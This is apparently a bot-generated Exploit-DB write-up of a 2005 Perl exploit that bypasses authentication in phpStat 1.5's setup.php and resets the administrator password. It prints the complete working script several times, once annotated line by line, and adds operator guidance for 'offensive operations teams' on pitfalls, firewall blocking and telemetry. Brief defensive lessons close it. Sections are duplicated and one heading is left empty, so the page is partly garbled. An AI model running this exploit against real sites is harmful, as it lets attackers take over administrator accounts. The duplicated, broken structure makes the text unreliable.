By exploitdb papers bot•May 30, 2005•

papers

phpStat 1.5 Authentication Bypass Exploit Explained

What this paper is

This paper details a vulnerability in phpStat version 1.5 that allows an attacker to bypass the authentication mechanism in the setup.php file. The exploit, written in Perl, targets this bypass to change the administrator's password without needing the original credentials.

Simple technical breakdown

The setup.php file in phpStat 1.5 has a flaw in how it checks user credentials. Specifically, it appears to be vulnerable to a specific HTTP GET request. By sending a crafted GET request with certain parameters, an attacker can trick the script into believing the authentication was successful, even without providing a valid password. The exploit script automates sending this crafted request to a target web server.

Complete code and payload walkthrough

The provided code is a Perl script designed to exploit the authentication bypass.

#!/usr/bin/perl
#####################################################################
#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################


use IO::Socket; # Imports the necessary module for network socket operations.

if (@ARGV < 3) # Checks if the number of command-line arguments is less than 3.
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set UnderGrounD Hacking Team      \n\n";
 print "         Usage: <T4rg3t> <DIR> <Password>\n\n"; # Informs the user about the correct usage.
 print "==========================================\n\n";
 print "Examples:\n\n";
 print "    phpStat.pl www.Site.com /phpstat/ 12345\n"; # Provides an example of how to run the script.
 exit(); # Exits the script if the arguments are insufficient.
}

my $host = $ARGV[0]; # Assigns the first command-line argument (target host) to the $host variable.
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); # Attempts to establish a TCP connection to the target host on port 80 (HTTP).

unless ($remote) { die "C4nn0t C0nn3ct to $host" } # If the connection fails, prints an error message and exits.

print "C0nn3cted\n"; # Confirms successful connection.

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n"; # Constructs the HTTP GET request.
                                                                                   # $ARGV[1] is the directory path.
                                                                                   # 'check=yes', 'username=admin' are likely parameters the script expects.
                                                                                   # 'password=$ARGV[2]' is the crucial part, where the attacker's chosen password is sent.
                                                                                   # 'HTTP/1.0' specifies the HTTP protocol version.
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; # Sets a common User-Agent string to mimic a legitimate browser.
$http .= "Host: $host\n\n\n\n"; # Sets the Host header to the target host and adds extra newlines to signify the end of headers.

print "[+]Sending H3ll Packet ...\n"; # Informs the user that the exploit request is being sent.
print $remote $http; # Sends the constructed HTTP request over the established socket connection.
sleep(1); # Pauses for 1 second.
print "[+]Wait For Authentication Bypass ...\n"; # Informs the user to wait for the bypass to occur.
sleep(100); # Pauses for 100 seconds, allowing time for the server to process the request and potentially update the password.
while (<$remote>) # Reads and discards any response from the server. This is done to clear the socket buffer.
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; # Informs the user that the exploit is likely successful.
print "[+]User: admin\n"; # States the username to use for login.
print "[+]Pass: $ARGV[2]"; # States the new password that was set.

# milw0rm.com [2005-05-30]

Code Fragment/Block -> Practical Purpose Mapping:

#!/usr/bin/perl: Shebang line, indicates the script should be executed with Perl.
use IO::Socket;: Imports the Perl module for creating and managing network sockets, essential for making HTTP requests.
if (@ARGV < 3): Checks for the correct number of command-line arguments.
print " Usage: <T4rg3t> <DIR> <Password>\n";: Displays usage instructions if arguments are missing.
my $host = $ARGV[0];: Captures the target hostname from the first argument.
my $remote = IO::Socket::INET->new (...): Establishes a TCP connection to the target host on port 80.
unless ($remote) { die ... }: Handles connection errors.
$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";: This is the core of the exploit. It crafts a GET request to setup.php. The parameters check=yes, username=admin, and password=$ARGV[2] are sent. The vulnerability lies in how setup.php processes these parameters, likely accepting the provided password for the 'admin' user without proper validation if check=yes is present.
$http .= "User-Agent: ...\n";: Adds a User-Agent header to make the request appear more like a standard browser request.
$http .= "Host: $host\n\n\n\n";: Adds the Host header and necessary newlines to terminate the HTTP headers.
print $remote $http;: Sends the crafted HTTP request to the server.
sleep(100);: A significant delay. This is likely to give the server-side script enough time to process the request and update the administrator's password before the client script finishes.
while (<$remote>) { }: Reads and discards any response from the server. This is a common practice to clear the socket buffer after sending a request, ensuring no lingering data interferes with subsequent operations (though in this simple script, it's mainly for cleanup).
print "[+]OK ! Now Goto ...\n";: Informs the user that the exploit has likely succeeded and provides the new login credentials.

Shellcode/Payload: There is no explicit shellcode in the traditional sense (e.g., raw machine code to be executed). The "payload" here is the crafted HTTP request itself. The effect of the payload is the modification of the administrator's password within the phpStat application's configuration or database.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server on port 80 (HTTP) or 443 (HTTPS, if the application is served over SSL, though this exploit targets HTTP). No local access or elevated privileges on the server are required.
Lab Preconditions:
- A local Perl interpreter installed on the operator's machine.
- A vulnerable phpStat 1.5 installation accessible from the operator's network. This can be set up in a lab environment using older versions of web servers (e.g., Apache 1.x/2.x) and PHP versions compatible with phpStat 1.5.
- Knowledge of the web root directory where phpStat is installed on the target.
Tooling Assumptions:
- Perl interpreter.
- Basic understanding of HTTP requests.
- Command-line access to run the Perl script.
Execution Pitfalls:
- Incorrect Directory Path ($ARGV[1]): If the DIR argument is wrong, the setup.php file will not be found at the specified location, and the exploit will fail. The path must be relative to the web server's document root and include a trailing slash (e.g., /phpstat/).
- Firewall/WAF Blocking: Modern firewalls or Web Application Firewalls (WAFs) might detect and block the unusual GET request parameters. The User-Agent string is generic, which helps, but the parameter structure itself could be flagged.
- Server-Side Patches: If the target server has already patched this specific vulnerability or has generic input validation in place, the exploit will not work.
- Network Latency/Timeouts: The sleep(100) is a heuristic. If the server is slow or under heavy load, the password change might not complete within this time, leading to a false positive. Conversely, if the server is very fast, the script might exit before the change is fully registered.
- Application Logic Changes: If the phpStat application has been modified or is running in a non-standard configuration, the expected parameter handling might differ.
- HTTPS: This script is hardcoded for HTTP (port 80). If the target uses HTTPS, the port and potentially the protocol handling would need modification.
Telemetry:
- Network Traffic: An HTTP GET request to /setup.php with specific parameters (check=yes, username=admin, password=<chosen_password>).
- Web Server Logs: Access logs showing the GET request to setup.php. If the exploit is successful, the server logs might show the request being processed, but the outcome (password change) is internal to the application.
- Application Logs (if any): phpStat might have its own logging mechanism that could record authentication attempts or configuration changes. This is less likely to be a standard feature for older web applications.
- Successful Login: The most direct telemetry for the operator is the ability to log in to the phpStat admin panel using the new credentials.

Where this was used and when

This exploit was published in May 2005. It targets phpStat version 1.5. Given the publication date, it's likely this vulnerability was actively exploited in the mid-2000s against websites running this specific version of phpStat. Such vulnerabilities were common in the early days of dynamic web applications before more robust security practices and automated defenses became widespread.

Defensive lessons for modern teams

Input Validation is Crucial: Never trust user input. All parameters, especially those related to authentication or configuration, must be rigorously validated on the server-side. This includes checking data types, lengths, allowed characters, and the overall context of the request.
Secure Authentication Flows: Authentication should never be bypassable through simple GET parameters. Use secure, established authentication mechanisms. Avoid exposing sensitive operations like password resets or administrative changes via simple, unauthenticated GET requests.
Regular Patching and Updates: Keeping web applications and their underlying frameworks (like PHP) updated is paramount. Vulnerabilities like this are often fixed in later versions.
Web Application Firewalls (WAFs): Deploying and configuring WAFs can help detect and block malicious HTTP requests, including those with suspicious parameter patterns.
Least Privilege Principle: Ensure that administrative functions are only accessible through authenticated sessions with appropriate privileges.
Secure Coding Practices: Developers should be trained on secure coding principles to avoid common vulnerabilities like SQL injection, cross-site scripting (XSS), and authentication bypasses.

ASCII visual (if applicable)

This exploit is a direct client-to-server interaction. An ASCII diagram can illustrate the flow:

+-----------------+       HTTP GET Request       +-----------------+
| Operator's      | ---------------------------->| Target Web      |
| Machine         |     (Exploit Script)         | Server          |
| (Perl Script)   |                              | (phpStat 1.5)   |
+-----------------+       (setup.php?check=yes&..)|                 |
                                                 |                 |
                                                 | Processes request|
                                                 | (Bypasses auth) |
                                                 | Updates password|
                                                 +-----------------+
                                                         ^
                                                         |
                                                         | HTTP Response
                                                         | (often ignored)
                                                         |
                                                 +-----------------+
                                                 | phpStat Admin   |
                                                 | Panel           |
                                                 +-----------------+
                                                         ^
                                                         | Operator logs in
                                                         | with new password
                                                         |
                                                 +-----------------+
                                                 | Operator's      |
                                                 | Machine         |
                                                 +-----------------+

Source references

Paper ID: 1016
Paper Title: phpStat 1.5 - 'setup.php' Authentication Bypass
Author: Alpha_Programmer
Published: 2005-05-30
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/1016
Raw URL: https://www.exploit-db.com/raw/1016

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
#####################################################################
#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################


use IO::Socket;

if (@ARGV < 3)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set UnderGrounD Hacking Team      \n\n";
 print "         Usage: <T4rg3t> <DIR> <Password>\n\n";
 print "==========================================\n\n";
 print "Examples:\n\n";
 print "    phpStat.pl www.Site.com /phpstat/ 12345\n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";

# milw0rm.com [2005-05-30]

Simple technical breakdown

Complete code and payload walkthrough

The provided code is a Perl script designed to exploit the authentication bypass.

#!/usr/bin/perl ##################################################################### #T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ##################################################################### # EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ) #E-Mail : Alpha_Programmer@Yahoo.com # #This Xpl Change Admin's Pass in This Portal !! #Discovered by: SoulBlack # #Vulnerable Version : phpStat 1.5 # ##################################################################### # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # # So Iranian Hacking & Security Teams : # # Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT ##################################################################### use IO::Socket; # Imports the necessary module for network socket operations. if (@ARGV < 3) # Checks if the number of command-line arguments is less than 3. { print "\n==========================================\n"; print " \n -- Exploit By Alpha Programmer --\n\n"; print " Trap-Set UnderGrounD Hacking Team \n\n"; print " Usage: <T4rg3t> <DIR> <Password>\n\n"; # Informs the user about the correct usage. print "==========================================\n\n"; print "Examples:\n\n"; print " phpStat.pl www.Site.com /phpstat/ 12345\n"; # Provides an example of how to run the script. exit(); # Exits the script if the arguments are insufficient. } my $host = $ARGV[0]; # Assigns the first command-line argument (target host) to the $host variable. my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); # Attempts to establish a TCP connection to the target host on port 80 (HTTP). unless ($remote) { die "C4nn0t C0nn3ct to $host" } # If the connection fails, prints an error message and exits. print "C0nn3cted\n"; # Confirms successful connection. $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n"; # Constructs the HTTP GET request. # $ARGV[1] is the directory path. # 'check=yes', 'username=admin' are likely parameters the script expects. # 'password=$ARGV[2]' is the crucial part, where the attacker's chosen password is sent. # 'HTTP/1.0' specifies the HTTP protocol version. $http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; # Sets a common User-Agent string to mimic a legitimate browser. $http .= "Host: $host\n\n\n\n"; # Sets the Host header to the target host and adds extra newlines to signify the end of headers. print "[+]Sending H3ll Packet ...\n"; # Informs the user that the exploit request is being sent. print $remote $http; # Sends the constructed HTTP request over the established socket connection. sleep(1); # Pauses for 1 second. print "[+]Wait For Authentication Bypass ...\n"; # Informs the user to wait for the bypass to occur. sleep(100); # Pauses for 100 seconds, allowing time for the server to process the request and potentially update the password. while (<$remote>) # Reads and discards any response from the server. This is done to clear the socket buffer. { } print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; # Informs the user that the exploit is likely successful. print "[+]User: admin\n"; # States the username to use for login. print "[+]Pass: $ARGV[2]"; # States the new password that was set. # milw0rm.com [2005-05-30]

Code Fragment/Block -> Practical Purpose Mapping:

#!/usr/bin/perl: Shebang line, indicates the script should be executed with Perl.

use IO::Socket;: Imports the Perl module for creating and managing network sockets, essential for making HTTP requests.

if (@ARGV < 3): Checks for the correct number of command-line arguments.

print " Usage: <T4rg3t> <DIR> <Password>\n";: Displays usage instructions if arguments are missing.

my $host = $ARGV[0];: Captures the target hostname from the first argument.

my $remote = IO::Socket::INET->new (...): Establishes a TCP connection to the target host on port 80.

unless ($remote) { die ... }: Handles connection errors.

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";: This is the core of the exploit. It crafts a GET request to setup.php. The parameters check=yes, username=admin, and password=$ARGV[2] are sent. The vulnerability lies in how setup.php processes these parameters, likely accepting the provided password for the 'admin' user without proper validation if check=yes is present.

$http .= "User-Agent: ...\n";: Adds a User-Agent header to make the request appear more like a standard browser request.

$http .= "Host: $host\n\n\n\n";: Adds the Host header and necessary newlines to terminate the HTTP headers.

print $remote $http;: Sends the crafted HTTP request to the server.

sleep(100);: A significant delay. This is likely to give the server-side script enough time to process the request and update the administrator's password before the client script finishes.

while (<$remote>) { }: Reads and discards any response from the server. This is a common practice to clear the socket buffer after sending a request, ensuring no lingering data interferes with subsequent operations (though in this simple script, it's mainly for cleanup).

print "[+]OK ! Now Goto ...\n";: Informs the user that the exploit has likely succeeded and provides the new login credentials.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server on port 80 (HTTP) or 443 (HTTPS, if the application is served over SSL, though this exploit targets HTTP). No local access or elevated privileges on the server are required.

Lab Preconditions:

A local Perl interpreter installed on the operator's machine.
A vulnerable phpStat 1.5 installation accessible from the operator's network. This can be set up in a lab environment using older versions of web servers (e.g., Apache 1.x/2.x) and PHP versions compatible with phpStat 1.5.
Knowledge of the web root directory where phpStat is installed on the target.

Tooling Assumptions:

Perl interpreter.
Basic understanding of HTTP requests.
Command-line access to run the Perl script.

Execution Pitfalls:

Incorrect Directory Path ($ARGV[1]): If the DIR argument is wrong, the setup.php file will not be found at the specified location, and the exploit will fail. The path must be relative to the web server's document root and include a trailing slash (e.g., /phpstat/).
Firewall/WAF Blocking: Modern firewalls or Web Application Firewalls (WAFs) might detect and block the unusual GET request parameters. The User-Agent string is generic, which helps, but the parameter structure itself could be flagged.
Server-Side Patches: If the target server has already patched this specific vulnerability or has generic input validation in place, the exploit will not work.
Network Latency/Timeouts: The sleep(100) is a heuristic. If the server is slow or under heavy load, the password change might not complete within this time, leading to a false positive. Conversely, if the server is very fast, the script might exit before the change is fully registered.
Application Logic Changes: If the phpStat application has been modified or is running in a non-standard configuration, the expected parameter handling might differ.
HTTPS: This script is hardcoded for HTTP (port 80). If the target uses HTTPS, the port and potentially the protocol handling would need modification.

Telemetry:

Network Traffic: An HTTP GET request to /setup.php with specific parameters (check=yes, username=admin, password=<chosen_password>).
Web Server Logs: Access logs showing the GET request to setup.php. If the exploit is successful, the server logs might show the request being processed, but the outcome (password change) is internal to the application.
Application Logs (if any): phpStat might have its own logging mechanism that could record authentication attempts or configuration changes. This is less likely to be a standard feature for older web applications.
Successful Login: The most direct telemetry for the operator is the ability to log in to the phpStat admin panel using the new credentials.

Where this was used and when

Defensive lessons for modern teams

Input Validation is Crucial: Never trust user input. All parameters, especially those related to authentication or configuration, must be rigorously validated on the server-side. This includes checking data types, lengths, allowed characters, and the overall context of the request.

Secure Authentication Flows: Authentication should never be bypassable through simple GET parameters. Use secure, established authentication mechanisms. Avoid exposing sensitive operations like password resets or administrative changes via simple, unauthenticated GET requests.

Regular Patching and Updates: Keeping web applications and their underlying frameworks (like PHP) updated is paramount. Vulnerabilities like this are often fixed in later versions.

Web Application Firewalls (WAFs): Deploying and configuring WAFs can help detect and block malicious HTTP requests, including those with suspicious parameter patterns.

Least Privilege Principle: Ensure that administrative functions are only accessible through authenticated sessions with appropriate privileges.

Secure Coding Practices: Developers should be trained on secure coding principles to avoid common vulnerabilities like SQL injection, cross-site scripting (XSS), and authentication bypasses.

ASCII visual (if applicable)

This exploit is a direct client-to-server interaction. An ASCII diagram can illustrate the flow:

+-----------------+ HTTP GET Request +-----------------+ | Operator's | ---------------------------->| Target Web | | Machine | (Exploit Script) | Server | | (Perl Script) | | (phpStat 1.5) | +-----------------+ (setup.php?check=yes&..)| | | | | Processes request| | (Bypasses auth) | | Updates password| +-----------------+ ^ | | HTTP Response | (often ignored) | +-----------------+ | phpStat Admin | | Panel | +-----------------+ ^ | Operator logs in | with new password | +-----------------+ | Operator's | | Machine | +-----------------+

Original Exploit-DB Content (Verbatim)